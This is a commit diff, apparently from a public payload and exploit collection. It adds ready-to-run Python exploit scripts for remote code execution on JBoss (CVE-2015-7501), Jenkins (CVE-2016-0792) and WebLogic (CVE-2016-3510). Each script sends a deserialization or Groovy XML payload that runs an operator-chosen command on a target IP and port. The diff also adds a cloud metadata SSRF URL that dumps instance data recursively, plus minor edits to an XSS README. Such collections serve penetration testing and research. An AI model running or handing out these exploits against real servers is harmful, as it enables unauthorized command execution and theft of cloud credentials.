More CVE - RCE : Jenkins, JBoss, WebLogic, WebSphere

CVE Exploits/JBoss CVE-2015-7501.py

@@ -0,0 +1,61 @@
+#! /usr/bin/env python2
+
+# Jboss Java Deserialization RCE (CVE-2015-7501)
+# Made with <3 by @byt3bl33d3r
+
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+import argparse
+import sys, os
+#from binascii import hexlify, unhexlify
+from subprocess import check_output
+
+ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
+ysoserial_path = None
+
+parser = argparse.ArgumentParser()
+parser.add_argument('target', type=str, help='Target IP')
+parser.add_argument('command', type=str, help='Command to run on target')
+parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
+parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')
+
+if len(sys.argv) < 2:
+    parser.print_help()
+    sys.exit(1)
+
+args = parser.parse_args()
+
+if not args.ysoserial_path:
+    for path in ysoserial_default_paths:
+        if os.path.exists(path):
+            ysoserial_path = path
+else:
+    if os.path.exists(args.ysoserial_path):
+        ysoserial_path = args.ysoserial_path
+
+if ysoserial_path is None:
+    print '[-] Could not find ysoserial JAR file'
+    sys.exit(1)
+
+if len(args.target.split(":")) != 2:
+    print '[-] Target must be in format IP:PORT'
+    sys.exit(1)
+
+if not args.command:
+    print '[-] You must specify a command to run'
+    sys.exit(1)
+
+ip, port = args.target.split(':')
+
+print '[*] Target IP: {}'.format(ip)
+print '[*] Target PORT: {}'.format(port)
+
+gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])
+
+r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)
+
+if r.status_code == 200:
+    print '[+] Command executed successfully'
+

CVE Exploits/Jenkins CVE-2016-0792.py

@@ -0,0 +1,83 @@
+#! /usr/bin/env python2
+
+#Jenkins Groovy XML RCE (CVE-2016-0792)
+#Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins
+#Made with <3 by @byt3bl33d3r
+
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+import argparse
+import sys
+
+parser = argparse.ArgumentParser()
+parser.add_argument('target', type=str, help='Target IP:PORT')
+parser.add_argument('command', type=str, help='Command to run on target')
+parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
+
+if len(sys.argv) < 2:
+    parser.print_help()
+    sys.exit(1)
+
+args = parser.parse_args()
+
+if len(args.target.split(':')) != 2:
+    print '[-] Target must be in format IP:PORT'
+    sys.exit(1)
+
+if not args.command:
+    print '[-] You must specify a command to run'
+    sys.exit(1)
+
+ip, port = args.target.split(':')
+
+print '[*] Target IP: {}'.format(ip)
+print '[*] Target PORT: {}'.format(port)
+
+xml_formatted = ''
+command_list = args.command.split()
+for cmd in command_list:
+    xml_formatted += '{:>16}<string>{}</string>\n'.format('', cmd)
+
+xml_payload = '''<map>
+  <entry>
+    <groovy.util.Expando>
+      <expandoProperties>
+        <entry>
+          <string>hashCode</string>
+          <org.codehaus.groovy.runtime.MethodClosure>
+            <delegate class="groovy.util.Expando" reference="../../../.."/>
+            <owner class="java.lang.ProcessBuilder">
+              <command>
+                {}
+              </command>
+              <redirectErrorStream>false</redirectErrorStream>
+            </owner>
+            <resolveStrategy>0</resolveStrategy>
+            <directive>0</directive>
+            <parameterTypes/>
+            <maximumNumberOfParameters>0</maximumNumberOfParameters>
+            <method>start</method>
+          </org.codehaus.groovy.runtime.MethodClosure>
+        </entry>
+      </expandoProperties>
+    </groovy.util.Expando>
+   <int>1</int>
+ </entry>
+</map>'''.format(xml_formatted.strip())
+
+print '[*] Generated XML payload:'
+print xml_payload
+print 
+
+print '[*] Sending payload'
+headers = {'Content-Type': 'text/xml'}
+r = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload)
+
+paths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\rand_dir\\config.xml']
+if r.status_code == 500:
+    for path in paths_in_trace:
+        if path in r.text:
+            print '[+] Command executed successfully'
+            break

CVE Exploits/WebLogic CVE-2016-3510.py

@@ -0,0 +1,71 @@
+#!/usr/bin/env python2
+
+#Oracle WebLogic Server Java Object Deserialization RCE (CVE-2016-3510)
+#Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits)
+#Made with <3 by @byt3bl33d3r
+
+import socket
+import struct
+import argparse
+import os
+import sys
+from subprocess import check_output
+
+ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
+ysoserial_path = None
+
+parser = argparse.ArgumentParser()
+parser.add_argument('target', type=str, help='Target IP:PORT')
+parser.add_argument('command', type=str, help='Command to run on target')
+parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')
+
+if len(sys.argv) < 2:
+    parser.print_help()
+    sys.exit(1)
+
+args = parser.parse_args()
+
+if not args.ysoserial_path:
+    for path in ysoserial_default_paths:
+        if os.path.exists(path):
+            ysoserial_path = path
+else:
+    if os.path.exists(args.ysoserial_path):
+        ysoserial_path = args.ysoserial_path
+
+if len(args.target.split(':')) != 2:
+    print '[-] Target must be in format IP:PORT'
+    sys.exit(1)
+
+if not args.command:
+    print '[-] You must specify a command to run'
+    sys.exit(1)
+
+ip, port = args.target.split(':')
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+print '[*] Target IP: {}'.format(ip)
+print '[*] Target PORT: {}'.format(port)
+
+sock.connect((ip, int(port)))
+
+# Send headers
+headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
+print '[*] Sending header'
+sock.sendall(headers)
+
+data = sock.recv(1024)
+print'[*] Received: "{}"'.format(data)
+
+payloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])
+
+payload = '\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
+payload += payloadObj
+payload += '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
+
+# adjust header for appropriate message length
+payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:])
+
+print '[*] Sending payload'
+sock.send(payload)

SSRF injection/README.md

@@ -350,6 +350,7 @@ Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)
 
 ```powershell
 http://metadata.google.internal/computeMetadata/v1beta1/
+http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
 ```
 
 ### SSRF URL for Digital Ocean

XSS injection/README.md

@@ -9,7 +9,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
 - [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)
 - [Polyglot XSS](#polyglot-xss)
 - [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
-- [CSP Bypas](#csp-bypass)
+- [CSP Bypass](#csp-bypass)
 - [Common WAF Bypas](#common-waf-bypass)
 
 ## Exploit code or POC
@@ -827,3 +827,4 @@ Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php
 - [XSSING WEB PART - 2 - Rakesh Mane](http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html)
 - [Making an XSS triggered by CSP bypass on Twitter. @tbmnull](https://medium.com/@tbmnull/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5)
 - [Ways to alert(document.domain) - @tomnomnom](https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309)
+- [D1T1 - Michele Spagnuolo and Lukas Wilschelbaum - So We Broke All CSPs](https://conference.hitb.org/hitbsecconf2017ams/materials/D1T1%20-%20Michele%20Spagnuolo%20and%20Lukas%20Wilschelbaum%20-%20So%20We%20Broke%20All%20CSPS.pdf)